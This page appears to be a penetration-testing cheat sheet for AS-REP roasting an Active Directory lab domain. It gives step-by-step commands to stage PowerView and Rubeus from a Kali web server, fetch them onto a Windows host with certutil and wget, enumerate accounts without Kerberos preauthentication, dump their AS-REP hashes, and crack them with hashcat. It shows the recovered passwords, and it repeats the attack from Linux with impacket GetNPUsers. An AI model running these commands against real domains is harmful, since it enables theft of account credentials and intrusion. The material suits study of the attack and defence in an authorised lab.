Skip to content

ASREPRoasting

from Windows with Rubeus.exe & PowerView.ps1

πŸ”¨ Expose PowerView on kali machine

on kali 

mkdir -p /home/kali/workspace/www && cd /home/kali/workspace/www
cp /opt/windows/PowerSploit/Recon/PowerView.ps1 .
python3 -m http.server 80

πŸ”¨ Download PowerView.ps1

option 1 - on windows [cmd] 

certutil -urlcache -f http://<KALI-IP>/PowerView.ps1 PowerView.ps1
option 2 - on windows [powershell] 
wget http://<KALI-IP>/PowerView.ps1 -O PowerView.ps1

πŸ”¨ Expose Rubeus.exe on kali machine

mkdir -p /home/kali/workspace/www && cd /home/kali/workspace/www
cp /opt/windows/GhostpackBinaries/Rubeus.exe .
python3 -m http.server 80

πŸ”¨ Download Rubeus.exe

[powershell] 

wget http://<KALI-IP>/Rubeus.exe -O Rubeus.exe

πŸ”¨ Enumerating accounts with DONT_REQ_PREAUTH

PowerView based tool used to search for the DONT_REQ_PREAUTH value across in user accounts in a target Windows domain. Performed from a Windows-based host.

Import-Module .\PowerView.ps1

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
|->
samaccountname     : Admin2
userprincipalname  : Admin2@CONTROLLER.local
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH

samaccountname     : User3
userprincipalname  : User3@CONTROLLER.local
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH

πŸ”¨ (op.1) Target a Specific User

Uses Rubeus to perform an ASEP Roasting attack and formats the output for Hashcat. Performed from a Windows-based host.

.\Rubeus.exe asreproast /user:Admin2  /nowrap /format:hashcat
|->
$krb5asrep$23$Admin2@CONTROLLER.local:FF90B94EB0168D4D06574D3A2B8787BA$EB84FCB07
9C0A28C5AD6172029DD0F57C38FBF5882515FDFBA528CA1C87175597147F1B3871828ECE0CD7403B40813F
BEF9161128C5D494B81DB9800E7CD27C0CB894D081168FD706F5E041A82E1342A71CB13F5C11188F078782
8B28525DB933AE450782296AAF9D2702E74519DA9EAF67D95F1B77E92D8A15F3F2FDC65854746BBD799FC9
BDCE066A3C232F02C04187CFBBA677E19DF267F6656BAA5A66B2F9DC8A18685824892582A708BB3A3D8DD0
0E5977EC4886D1F02886679F05F7C621D1769F7D76357209D29A6CF46A4701057BAD2A6C310E8C9856F6BA
116063A1470343F1B5CC997084C77C7DCB0FEB6987DB053E0

.\Rubeus.exe asreproast /user:User3 /nowrap /format:hashcat
|->
$krb5asrep$23$User3@CONTROLLER.local:DFB1482580F1EC36315B90F76D7EA0EA$4753CCE65B
F1CB613D99D92B682AD0BE9917631E25403C88C84E9363536963611CBD7B800E57423B052C10C86BEE810E
953DD0E7E8C98268ACC3FEB91CBB14744A2CA65F5B5E0B730ADBD5755281D3D7EFFB5700DAEAF080205B5E
BD7458C94997E7192A78A968A5458C11D37966B5E600FF2C8D86344567C6FEE14856FCF9060EED29992472
451501E632A1A02A36723FF21C9741FA63312D8913EDE500C49B2D650E4FE36FB1377E18F25C5FF0C51FA8
8CCDD524C60195D03770FEDD81E2494E891A252F290DD20E0513D711EE2A1B1B0FFE1E9F7ACF6E614D1134
C444B6D8E70FF35F63F41DDE45E201557C80C030B55FDBD0

πŸ”¨ (op.2) Target all Users

.\Rubeus.exe asreproast /nowrap /format:hashcat

πŸ”¨ Cracking the Hash with Hashcat

Uses Hashcat to attempt to crack the captured hash using a wordlist (rockyou.txt). Performed from a Linux-based host.

  • pass.txt - /usr/share/wordlists/rockyou.txt
  • pass.txt - wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt -O pass.txt

cat hash-raw-admin2.txt | tr -d "\n" | tr -d " "  > hash-admin2.txt

cat hash-raw-user3.txt | tr -d "\n" | tr -d " "  > hash-user3.txt

hashcat -m 18200 hash-admin2.txt /usr/share/wordlists/rockyou.txt
|->
P@$$W0rd2

hashcat -m 18200 hash-user3.txt /usr/share/wordlists/rockyou.txt
|->
Password3

from Linux with impacket

/opt/tools/impacket/examples/GetNPUsers.py -dc-ip CONTROLLER.local -outputfile hashes.asreproast -request CONTROLLER.local/Administrator
|<- P@$$W0rd

hashcat -m 18200 hashes.asreproast pass.txt --force